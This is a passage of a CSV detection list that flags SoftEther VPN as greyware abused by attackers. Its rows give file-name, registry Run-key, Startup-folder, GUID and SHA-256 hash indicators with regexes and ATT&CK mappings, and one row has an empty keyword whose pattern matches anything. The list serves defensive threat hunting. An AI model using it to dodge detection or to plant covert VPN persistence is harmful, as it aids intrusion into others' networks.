T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\SoftEtherVPN-*.tar.xz*",".{0,1000}\\SoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\SoftEtherVPN_build-*.zip*",".{0,1000}\\SoftEtherVPN_build\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\softether-vpnclient-*.exe*",".{0,1000}\\softether\-vpnclient\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\softether-vpnserver_*.exe*",".{0,1000}\\softether\-vpnserver_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\softether-vpnserver_vpnbridge-*.exe*",".{0,1000}\\softether\-vpnserver_vpnbridge\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftEther VPN*",".{0,1000}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\Start Menu\Programs\StartUp\SoftEther VPN Client*",".{0,1000}\\Start\sMenu\\Programs\\StartUp\\SoftEther\sVPN\sClient.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\Uninstall\softether_sedevvpnclient*",".{0,1000}\\Uninstall\\softether_sedevvpnclient.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\vpncmgr.exe*",".{0,1000}\\vpncmgr\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#companyname","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*>SoftEther VPN Setup (Developer 
Edition)<*",".{0,1000}\>SoftEther\sVPN\sSetup\s\(Developer\sEdition\)\<.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*>SoftEther VPN Setup<*",".{0,1000}\>SoftEther\sVPN\sSetup\<.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*00B41CF0-7AE9-4542-9970-77B312412535*",".{0,1000}00B41CF0\-7AE9\-4542\-9970\-77B312412535.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*096311de816ac0a5c886680f6e60f99ad60df58773f2dbece09fb35e48b5702c*",".{0,1000}096311de816ac0a5c886680f6e60f99ad60df58773f2dbece09fb35e48b5702c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*09b5f413ec7c75c4ad05a832f70512725f706be190b77a04bf459ba46bf4fb1a*",".{0,1000}09b5f413ec7c75c4ad05a832f70512725f706be190b77a04bf459ba46bf4fb1a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*0e6ac7f5a2adec8973bcb337c1f12f28931b76f3e3d45b14d63acf1e3bf07a31*",".{0,1000}0e6ac7f5a2adec8973bcb337c1f12f28931b76f3e3d45b14d63acf1e3bf07a31.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*115426ae1c906030d369a2d7f37ccdbc059869f709add60b6a8177a8100e7b61*",".{0,1000}115426ae1c906030d369a2d7f37ccdbc059869f709add60b6a8177a8100e7b61.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*121559209213c1de5bccd241092888985985c6992122e59d1ef053b89d5b9c99*",".{0,1000}121559209213c1de5bccd241092888985985c6992122e59d1ef053b89d5b9c99.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*18c7944f13fe80a024cb1fdce6a2621dcd2ab11f639773d42902aec34085b51e*",".{0,1000}18c7944f13fe80a024cb1fdce6a2621dcd2ab11f639773d42902aec34085b51e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*19ee368d7680478dc89a246dbf3e57a05242a239a68d40ec6529208425fbf485*",".{0,1000}19ee368d7680478dc89a246dbf3e57a05242a239a68d40ec6529208425fbf485.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*1b14c2ba7ba16b131c65a8e61bddef8db25bec2d641ff138b9a84a522581aff7*",".{0,1000}1b14c2ba7ba16b131c65a8e61bddef8db25bec2d641ff138b9a84a522581aff7.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*20562bf31696728f41152473ae781c24d7a6809ad34c57fc4f8219ddc0d98f47*",".{0,1000}20562bf31696728f41152473ae781c24d7a6809ad34c57fc4f8219ddc0d98f47.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 
T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*2222ef48b3f9102265ef7d27e496ad40a1bd1eaba8093bc5e696b48402c52441*",".{0,1000}2222ef48b3f9102265ef7d27e496ad40a1bd1eaba8093bc5e696b48402c52441.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*27d9a04aeaab3a37b0de7e3976fd928695c3e2488e7b6b8be5d95e8fa1dd8f4a*",".{0,1000}27d9a04aeaab3a37b0de7e3976fd928695c3e2488e7b6b8be5d95e8fa1dd8f4a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*284fb65de7d9c928ca978cebd863136e79c618d65b357d3da9faeed6008783cb*",".{0,1000}284fb65de7d9c928ca978cebd863136e79c618d65b357d3da9faeed6008783cb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*2a0542f8d159539b07faeb5849be99d1c62e1c16d236178fdc13eb2ebb7b262e*",".{0,1000}2a0542f8d159539b07faeb5849be99d1c62e1c16d236178fdc13eb2ebb7b262e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol 
VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*2a7896d5bad2028fec904ac21e4355e0446ad5c9036bd1c3b8b2e93e0646bd6e*",".{0,1000}2a7896d5bad2028fec904ac21e4355e0446ad5c9036bd1c3b8b2e93e0646bd6e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*2acb885af8fce92b0cca89d8e2b82d954a85f8ce0751a27258a3c4cdd2f8ef88*",".{0,1000}2acb885af8fce92b0cca89d8e2b82d954a85f8ce0751a27258a3c4cdd2f8ef88.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*34b8d45bfea0d60f3b897a8c36276bdfeb7e9b00f0ee673d43f4555baf9eb8b4*",".{0,1000}34b8d45bfea0d60f3b897a8c36276bdfeb7e9b00f0ee673d43f4555baf9eb8b4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*381bca8edcf6cb2302baccebc9daada145989116aace489ba3d9072a57a853ed*",".{0,1000}381bca8edcf6cb2302baccebc9daada145989116aace489ba3d9072a57a853ed.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*38b4843755a0ceca33637b4a1bc052b4c379b666e512511c4629ca6a65468bd3*",".{0,1000}38b4843755a0ceca33637b4a1bc052b4c379b666e512511c4629ca6a65468bd3.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*3bef28a58c4ee75b3b4ac0a6025f1c0332bb1d9f27d066082fa2e32416da4eac*",".{0,1000}3bef28a58c4ee75b3b4ac0a6025f1c0332bb1d9f27d066082fa2e32416da4eac.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*3d3deaf15f2bf36dc998286809ee0fa327cb526bd5a93026d8124af3b8d8182b*",".{0,1000}3d3deaf15f2bf36dc998286809ee0fa327cb526bd5a93026d8124af3b8d8182b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*43d3a9e3e07ebacf08278a47845b29b0c29daac00ae1d6ca7756f47de4a67b7b*",".{0,1000}43d3a9e3e07ebacf08278a47845b29b0c29daac00ae1d6ca7756f47de4a67b7b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*447d9a15567f0eb81871ddbdc2de28bd2e339b892548bab25a9f58afbbc177a7*",".{0,1000}447d9a15567f0eb81871ddbdc2de28bd2e339b892548bab25a9f58afbbc177a7.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*4876b52e363af1705a6c5ccc1c6be930dd47226f4b2835ec827bf8e4de33c40f*",".{0,1000}4876b52e363af1705a6c5ccc1c6be930dd47226f4b2835ec827bf8e4de33c40f.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*498244e2fa32092cfd4b6f2d0b62a8f963724738cd01ed9f623369ff55a309f8*",".{0,1000}498244e2fa32092cfd4b6f2d0b62a8f963724738cd01ed9f623369ff55a309f8.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 
T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*4f42773bb9fa283dc34d4c54347b197b95176024cf3fc6c1e11932f2a56188da*",".{0,1000}4f42773bb9fa283dc34d4c54347b197b95176024cf3fc6c1e11932f2a56188da.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*507a32af5f58e47f635053b3ff0605db2e819cd63d31709e40cb1d98364b015b*",".{0,1000}507a32af5f58e47f635053b3ff0605db2e819cd63d31709e40cb1d98364b015b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*51a6e79cd5c7e100116719a73c4f005f8b5dc59027adfe75e77d154af938d698*",".{0,1000}51a6e79cd5c7e100116719a73c4f005f8b5dc59027adfe75e77d154af938d698.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*55af645a3111f2f9ecf35df965f709378a72e216d1963c134cade7391c24f563*",".{0,1000}55af645a3111f2f9ecf35df965f709378a72e216d1963c134cade7391c24f563.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol 
VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*56930110ad5e21a3b7c69008bdb3efd368c0ebafc1d0d97b48a76a3563ec8e24*",".{0,1000}56930110ad5e21a3b7c69008bdb3efd368c0ebafc1d0d97b48a76a3563ec8e24.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*57f265c72747a75c914118d2f69550b534d661f49bf8684c81f7ef75c952f97a*",".{0,1000}57f265c72747a75c914118d2f69550b534d661f49bf8684c81f7ef75c952f97a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*5ba980906682ff6eb47a50cb6208901518e62d013ff46075e96a919331dc23b4*",".{0,1000}5ba980906682ff6eb47a50cb6208901518e62d013ff46075e96a919331dc23b4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*5f2cab7fc38140b2cc11a54ab687ab4fb8966ca4965822b8c85025d45a47c0fd*",".{0,1000}5f2cab7fc38140b2cc11a54ab687ab4fb8966ca4965822b8c85025d45a47c0fd.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*60e0928a261b230fb6fffc711348a4acc1a73a00d95a0060eecd96e9c7c16a82*",".{0,1000}60e0928a261b230fb6fffc711348a4acc1a73a00d95a0060eecd96e9c7c16a82.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*61dc49f7c5b09a72e96329e43bb3a896c428da449bb67c7803d21eaabd7591b6*",".{0,1000}61dc49f7c5b09a72e96329e43bb3a896c428da449bb67c7803d21eaabd7591b6.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*626d14d508afc1bcbed6e013d531d64a1c5fac529790857ad2730f6ca864aece*",".{0,1000}626d14d508afc1bcbed6e013d531d64a1c5fac529790857ad2730f6ca864aece.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*6440ef1a2fab83dfb27e976067134eb5767fbdcf20e7ad73f217b37ce3014eed*",".{0,1000}6440ef1a2fab83dfb27e976067134eb5767fbdcf20e7ad73f217b37ce3014eed.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*6f486fb6576a30179b3ef6bf36ad0bec39745f22d504209abd602338c77707b9*",".{0,1000}6f486fb6576a30179b3ef6bf36ad0bec39745f22d504209abd602338c77707b9.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*701b8a45901f7dc715140662e68f7d7e8c59f631866f9ac862896cd06a2d5865*",".{0,1000}701b8a45901f7dc715140662e68f7d7e8c59f631866f9ac862896cd06a2d5865.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*744a0029e2e666d09e3fad6304782ceb12997dbaf2b9288caaf8485c80ddf949*",".{0,1000}744a0029e2e666d09e3fad6304782ceb12997dbaf2b9288caaf8485c80ddf949.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 
